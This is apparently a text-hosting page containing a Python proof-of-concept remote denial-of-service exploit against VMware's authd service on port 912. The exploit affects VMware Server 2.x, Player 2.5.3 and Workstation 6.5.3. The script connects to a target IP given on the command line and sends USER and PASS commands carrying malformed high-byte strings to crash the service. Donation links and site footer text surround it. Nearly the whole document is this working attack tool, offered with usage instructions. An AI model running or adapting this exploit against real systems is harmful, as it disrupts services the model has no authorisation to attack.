Want to help support the site? Donate Bitcoins @ 1BSyxQbLhq5vMijFZ3hrZQmNMrxC5dVEcM
Admin Password
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python
###########################################################
#
# VMware Server 2.x (vmware-authd.exe) Remote DoS Exploit
# Found By: Dr_IDE
# Original Approach and Findings By: shinnai
# Tested on Windows 7RC, XPSP3
#
# Note: This is more of an update to shinnai's original PoC
# This will now successfully DoS at least the following:
#
# -VMware Server 2.0.0.2073
# -VMware Player 2.5.3
# -WMware Workstation 6.5.3
#
#
###########################################################
import socket, sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print ("\n\n#####################################################");
print ("# \"Universal\" VMware auth-d Remote DoS Exploit #");
print ("# By: Dr_IDE #");
print ("# Credits to: shinnai #");
print ("# Usage: ./script <target IP> #");
print ("#####################################################");
print ("[*] Connecting to target.");
s.connect((sys.argv[1], 912));
d = s.recv(1024);
print ("[i] Server response: \n");
print (d);
s.send('USER \x25\x90 \r\n'); # \x80 and higher seems to work
print ('[*] Sending command "USER" + evil string.\n');
d = s.recv(1024);
print ("[i] Server response: " + d);
s.send('PASS \x25\x90 \r\n'); # \x80 and higher seems to work
print ('[*] Sending command "PASS" + evil string.\n');
try:
d = s.recv(1024);
print ("[i] Server response: " + d);
except:
print ("[*] Exploit completed successfully.");
except:
print ("[-] Error, Could not connect to the auth-d server.");
#[pocoftheday.blogspot.com]
Dank Papes! Looking for dank papes?
It's a piece of cake to get a pape that's dank at dankpapes.com

Enjoy the site? All donations are appreciated. Paypal or BTC

Donate BTC: 1BSyxQbLhq5vMijFZ3hrZQmNMrxC5dVEcM

Free Text Host is brought to you by Dagon Design
This site contains no adware, spyware, or popups
Questions? Comments?     Privacy Policy     Report abuse here